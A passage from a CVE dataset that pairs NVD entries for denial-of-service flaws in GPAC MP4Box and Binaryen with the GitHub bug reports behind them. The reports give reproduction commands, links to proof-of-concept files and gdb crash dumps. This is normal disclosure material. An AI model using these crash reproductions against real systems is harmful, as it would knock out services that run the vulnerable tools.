wasm::Walker<wasm::BranchUtils::BranchSeeker, wasm::UnifiedExpressionVisitor<wasm::BranchUtils::BranchSeeker, void> >::doVisitBrOn(wasm::BranchUtils::BranchSeeker*, wasm::Expression**) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #8 0x00007ffff7a01ef1 in wasm::BranchUtils::BranchSeeker::has(wasm::Expression*, wasm::Name) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #9 0x00007ffff7bd974f in wasm::handleUnreachable(wasm::Block*, wasm::Block::Breakability) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #10 0x00007ffff7c0f923 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #11 0x00007ffff7c11f0d in wasm::WasmBinaryBuilder::visitIf(wasm::If*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #12 0x00007ffff7c0acb2 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #13 0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #14 0x00007ffff7c0f840 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #15 0x00007ffff7c11fcd in wasm::WasmBinaryBuilder::visitIf(wasm::If*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #16 0x00007ffff7c0acb2 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #17 0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #18 0x00007ffff7c0f840 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #19 0x00007ffff7c11f0d in wasm::WasmBinaryBuilder::visitIf(wasm::If*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #20 0x00007ffff7c0acb2 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #21 0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #22 0x00007ffff7c0f840 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #23 0x00007ffff7c11f0d in wasm::WasmBinaryBuilder::visitIf(wasm::If*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #24 0x00007ffff7c0acb2 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #25 0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #26 0x00007ffff7c0f012 in wasm::WasmBinaryBuilder::visitBlock(wasm::Block*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #27 0x00007ffff7c0b29e in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #28 0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #29 0x00007ffff7c0f840 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #30 0x00007ffff7c1026b in wasm::WasmBinaryBuilder::readFunctions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #31 0x00007ffff7c11802 in wasm::WasmBinaryBuilder::read() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #32 0x00007ffff7c3d766 in wasm::ModuleReader::readBinaryData(std::vector<char, std::allocator<char> >&, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #33 0x00007ffff7c3df6c in wasm::ModuleReader::readBinary(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #34 0x00007ffff7c3e641 in wasm::ModuleReader::read(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #35 0x000055555557e5bb in main () #36 0x00007ffff6d760b3 in __libc_start_main (main=0x55555557cb40 <main>, argc=0x2, argv=0x7fffffffe258, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe248) at ../csu/libc-start.c:308 #37 0x000055555557f97e in _start () ```
An assertion abort in wasm::handle_unreachable(char const*, char const*, unsigned int) ()
https://api.github.com/repos/WebAssembly/binaryen/issues/4383/comments
0
2021-12-10T22:07:52Z
2021-12-16T17:39:18Z
https://github.com/WebAssembly/binaryen/issues/4383
1,077,269,909
4,383
2,883
CVE-2021-45291
2021-12-21T18:15:08.257
The gf_dump_setup function in GPAC 1.0.1 allows malicoius users to cause a denial of service (Invalid memory address dereference) via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1955" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1955" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/gpac/gpac/issues/1955
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1527-g6fcf9819e-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-mp4box --prefix=/home/zxq/CVE_testing/sourceproject/gpac/cmakebuild --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) **command:** ``` ./bin/gcc/MP4Box -lsr POC ``` [POC.zip](https://github.com/gpac/gpac/files/7690542/POC.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [ODF] Error reading descriptor (tag 4 size 0): Invalid MPEG-4 Descriptor [iso file] Incomplete box mdat - start 11495 size 128 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [ODF] Error reading descriptor (tag 4 size 0): Invalid MPEG-4 Descriptor [iso file] Incomplete box mdat - start 11495 size 128 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [MP4 Loading] Unable to fetch sample 1 from track ID 8 - aborting track import Scene loaded - dumping 1 systems streams [1] 1233733 segmentation fault ``` **gdb information:** ``` [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x400788 --> 0x0 RCX: 0x0 RDX: 0x0 RSI: 0x0 RDI: 0x10f40f0 --> 0x10f4590 --> 0x10f4460 --> 0x70003 RBP: 0x7fffffff87b0 --> 0x7fffffff8850 --> 0x7fffffff9950 --> 0x7fffffffe1f0 --> 0x7fffffffe210 --> 0xd078f0 (<__libc_csu_init>: endbr64) RSP: 0x7fffffff8750 --> 0x10f4090 --> 0x10002 RIP: 0x6d9986 (<gf_dump_setup+365>: movzx eax,BYTE PTR [rax+0x8]) R8 : 0xe3d1d3 (" Scene Dump -->\n") R9 : 0x12 R10: 0xfffffffb R11: 0xe3d1c2 --> 0x565300526553414c ('LASeR') R12: 0xd07990 (<__libc_csu_fini>: endbr64) R13: 0x0 R14: 0x10a3018 --> 0xd7e490 (<__memmove_avx_unaligned_erms>: endbr64) R15: 0x0 EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x6d997a <gf_dump_setup+353>: mov QWORD PTR [rbp-0x38],rax 0x6d997e <gf_dump_setup+357>: mov rax,QWORD PTR [rbp-0x38] 0x6d9982 <gf_dump_setup+361>: mov rax,QWORD PTR [rax+0x18] => 0x6d9986 <gf_dump_setup+365>: movzx eax,BYTE PTR [rax+0x8] 0x6d998a <gf_dump_setup+369>: cmp al,0x3 0x6d998c <gf_dump_setup+371>: jne 0x6d99ff <gf_dump_setup+486> 0x6d998e <gf_dump_setup+373>: mov rax,QWORD PTR [rbp-0x38] 0x6d9992 <gf_dump_setup+377>: mov rax,QWORD PTR [rax+0x18] [------------------------------------stack-------------------------------------] 0000| 0x7fffffff8750 --> 0x10f4090 --> 0x10002 0008| 0x7fffffff8758 --> 0x10f47d0 --> 0x10e99f0 --> 0x0 0016| 0x7fffffff8760 --> 0x500400788 0024| 0x7fffffff8768 --> 0x200000000 0032| 0x7fffffff8770 --> 0x10f4090 --> 0x10002 0040| 0x7fffffff8778 --> 0x10f4460 --> 0x70003 0048| 0x7fffffff8780 --> 0x7fffffff87b0 --> 0x7fffffff8850 --> 0x7fffffff9950 --> 0x7fffffffe1f0 --> 0x7fffffffe210 (--> ...) 0056| 0x7fffffff8788 --> 0x444a92 (<gf_list_enum+61>: mov QWORD PTR [rbp-0x8],rax) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV gf_dump_setup (sdump=0x10f47d0, root_od=0x10f4090) at scene_manager/scene_dump.c:243 243 if (esd->decoderConfig->streamType != GF_STREAM_SCENE) continue; ```
A segmentation fault in gf_dump_setup() at scene_manager/scene_dump.c:243
https://api.github.com/repos/gpac/gpac/issues/1955/comments
0
2021-12-10T06:46:26Z
2021-12-10T10:01:21Z
https://github.com/gpac/gpac/issues/1955
1,076,499,514
1,955
2,884
CVE-2021-45292
2021-12-21T18:15:08.297
The gf_isom_hint_rtp_read function in GPAC 1.0.1 allows attackers to cause a denial of service (Invalid memory address dereference) via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1958" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1958" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1958
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1527-g6fcf9819e-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-mp4box --prefix=/home/zxq/CVE_testing/sourceproject/gpac/cmakebuild --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) **command:** ``` ./bin/gcc/MP4Box -disox -ttxt -2 -dump-chap-ogg -dump-cover -drtp -bt -out /dev/null poc ``` [poc.zip](https://github.com/gpac/gpac/files/7691140/poc.zip) **Result** ``` [9] 3114513 segmentation fault ``` **GDB information** ``` Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x400788 --> 0x0 RCX: 0xcffd67 (<__libc_write+23>: cmp rax,0xfffffffffffff000) RDX: 0x0 RSI: 0x0 RDI: 0x10f4580 --> 0x0 RBP: 0x7fffffff9340 --> 0x7fffffff9360 --> 0x7fffffff93c0 --> 0x7fffffff9450 --> 0x7fffffff98b0 --> 0x7fffffffe150 (--> ...) RSP: 0x7fffffff9300 --> 0x10eb8f0 --> 0x0 RIP: 0x60afe1 (<gf_isom_hint_rtp_read+414>: mov rax,QWORD PTR [rax+0x8]) R8 : 0x0 R9 : 0x0 R10: 0x0 R11: 0x246 R12: 0xd07990 (<__libc_csu_fini>: endbr64) R13: 0x0 R14: 0x10a3018 --> 0xd7e490 (<__memmove_avx_unaligned_erms>: endbr64) R15: 0x0 EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x60afd5 <gf_isom_hint_rtp_read+402>: mov rdi,rax 0x60afd8 <gf_isom_hint_rtp_read+405>: call 0x444624 <gf_list_add> 0x60afdd <gf_isom_hint_rtp_read+410>: mov rax,QWORD PTR [rbp-0x18] => 0x60afe1 <gf_isom_hint_rtp_read+414>: mov rax,QWORD PTR [rax+0x8] 0x60afe5 <gf_isom_hint_rtp_read+418>: add DWORD PTR [rbp-0x28],eax 0x60afe8 <gf_isom_hint_rtp_read+421>: mov eax,DWORD PTR [rbp-0x28] 0x60afeb <gf_isom_hint_rtp_read+424>: cmp eax,DWORD PTR [rbp-0x20] 0x60afee <gf_isom_hint_rtp_read+427>: jb 0x60afa2 <gf_isom_hint_rtp_read+351> [------------------------------------stack-------------------------------------] 0000| 0x7fffffff9300 --> 0x10eb8f0 --> 0x0 0008| 0x7fffffff9308 --> 0x10e9510 --> 0xf872747020 0016| 0x7fffffff9310 --> 0x1000000010050 0024| 0x7fffffff9318 --> 0x4 0032| 0x7fffffff9320 --> 0x10001 0040| 0x7fffffff9328 --> 0x0 0048| 0x7fffffff9330 --> 0x7fffffff9360 --> 0x7fffffff93c0 --> 0x7fffffff9450 --> 0x7fffffff98b0 --> 0x7fffffffe150 (--> ...) 0056| 0x7fffffff9338 --> 0x5fb0ffd851107300 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x000000000060afe1 in gf_isom_hint_rtp_read (ptr=0x10e9510, bs=0x10eb8f0) at isomedia/hinting.c:682 682 tempSize += (u32) a->size; gdb-peda$ bt #0 0x000000000060afe1 in gf_isom_hint_rtp_read (ptr=0x10e9510, bs=0x10eb8f0) at isomedia/hinting.c:682 #1 0x000000000060a32f in gf_isom_hint_pck_read (ptr=0x10e9510, bs=0x10eb8f0) at isomedia/hinting.c:329 #2 0x0000000000609f4e in gf_isom_hint_sample_read (ptr=0x10efdc0, bs=0x10eb8f0, sampleSize=0x20) at isomedia/hinting.c:212 #3 0x000000000058e156 in gf_isom_dump_hint_sample (the_file=0x10dd6c0, trackNumber=0x2, SampleNum=0xf8, trace=0x10e9f30) at isomedia/box_dump.c:2844 #4 0x0000000000419dc3 in dump_isom_rtp (file=0x10dd6c0, inName=0x7fffffffe602 "/dev/null", is_final_name=GF_TRUE) at filedump.c:860 #5 0x00000000004156b0 in mp4boxMain (argc=0xb, argv=0x7fffffffe2a8) at main.c:6090 #6 0x000000000041719b in main (argc=0xb, argv=0x7fffffffe2a8) at main.c:6496 #7 0x0000000000d07120 in __libc_start_main () #8 0x000000000040211e in _start () ```
A segmentation fault in gf_isom_hint_rtp_read () , isomedia/hinting.c:682
https://api.github.com/repos/gpac/gpac/issues/1958/comments
0
2021-12-10T08:22:50Z
2021-12-10T10:01:22Z
https://github.com/gpac/gpac/issues/1958
1,076,565,216
1,958
2,885
CVE-2021-45293
2021-12-21T18:15:08.333
A Denial of Service vulnerability exists in Binaryen 103 due to an Invalid memory address dereference in wasm::WasmBinaryBuilder::visitLet.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4384" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UKGCHPS7UAIOOBGSXDJAUFE5CROTTF6J/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YCWLB4PWYQO55F7IGNC7KUYN2MFZE3JP/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4384" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UKGCHPS7UAIOOBGSXDJAUFE5CROTTF6J/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YCWLB4PWYQO55F7IGNC7KUYN2MFZE3JP/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:binaryen:103:*:*:*:*:*:*:*", "matchCriteriaId": "851AA3FC-CFB5-4A99-A10C-830974545702", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/WebAssembly/binaryen/issues/4384
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "WebAssembly", "binaryen" ]
**Version:** ``` version_103 ``` **System information** Ubuntu 20.04.1 LTS, clang version 10.0.0-4ubuntu1 **command:** ``` ./wasm-dis POC2 ``` [POC2.zip](https://github.com/WebAssembly/binaryen/files/7695742/POC2.zip) **Result** ``` [28] 3932046 segmentation fault ./wasm-dis ``` **GDB information** ``` Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x2 RBX: 0x7fffffffd390 --> 0x7fffffffd8c0 --> 0x0 RCX: 0x0 RDX: 0x0 RSI: 0xffffffff RDI: 0x7fffffffd390 --> 0x7fffffffd8c0 --> 0x0 RBP: 0x7fffffffcf40 --> 0x7fffffffd030 --> 0x7fffffffd0a0 --> 0x7fffffffd100 --> 0x7fffffffd1e0 --> 0x7fffffffd370 (--> ...) RSP: 0x7fffffffce90 --> 0x8 RIP: 0x7ffff7c1203c (<_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+76>: mov rax,QWORD PTR [rdx+0x38]) R8 : 0x0 R9 : 0x0 R10: 0x7ffff74d633d ("_ZN4wasm17WasmBinaryBuilder16startControlFlowEPNS_10ExpressionE") R11: 0x7ffff7be2080 (<_ZN4wasm17WasmBinaryBuilder16startControlFlowEPNS_10ExpressionE>: endbr64) R12: 0x17 R13: 0x55555559ec68 --> 0x1 R14: 0x7fffffffcf80 --> 0x7fffffffd038 --> 0x7ffff7c0ba5e (<_ZN4wasm17WasmBinaryBuilder18processExpressionsEv+110>: mov rsi,QWORD PTR [rbp-0x60]) R15: 0x1 EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff7c1202e <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+62>: mov rdx,QWORD PTR [rbx+0x148] 0x7ffff7c12035 <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+69>: mov rdi,rbx 0x7ffff7c12038 <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+72>: mov QWORD PTR [r13+0x8],rax => 0x7ffff7c1203c <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+76>: mov rax,QWORD PTR [rdx+0x38] 0x7ffff7c12040 <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+80>: sub rax,QWORD PTR [rdx+0x30] 0x7ffff7c12044 <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+84>: sar rax,0x3 0x7ffff7c12048 <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+88>: mov r15,rax 0x7ffff7c1204b <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+91>: mov QWORD PTR [rbp-0x88],rax [------------------------------------stack-------------------------------------] 0000| 0x7fffffffce90 --> 0x8 0008| 0x7fffffffce98 --> 0x7fffffffcf10 --> 0x7fffffffcf80 --> 0x7fffffffd038 --> 0x7ffff7c0ba5e (<_ZN4wasm17WasmBinaryBuilder18processExpressionsEv+110>: mov rsi,QWORD PTR [rbp-0x60]) 0016| 0x7fffffffcea0 --> 0x7fffffffd390 --> 0x7fffffffd8c0 --> 0x0 0024| 0x7fffffffcea8 --> 0x659c1cad59c48400 0032| 0x7fffffffceb0 --> 0x7fffffffd6c0 --> 0x55555558a7c0 --> 0x55555559ec50 --> 0xa ('\n') 0040| 0x7fffffffceb8 --> 0x7fffffffd390 --> 0x7fffffffd8c0 --> 0x0 0048| 0x7fffffffcec0 --> 0x7fffffffd390 --> 0x7fffffffd8c0 --> 0x0 0056| 0x7fffffffcec8 --> 0x7ffff76384e1 (<_ZN10MixedArena10allocSpaceEmm+65>: mov rbx,rax) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff7c1203c in wasm::WasmBinaryBuilder::visitLet(wasm::Block*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so gdb-peda$ bt #0 0x00007ffff7c1203c in wasm::WasmBinaryBuilder::visitLet(wasm::Block*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #1 0x00007ffff7c0a742 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #2 0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #3 0x00007ffff7c0bd06 in wasm::WasmBinaryBuilder::readExpression() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #4 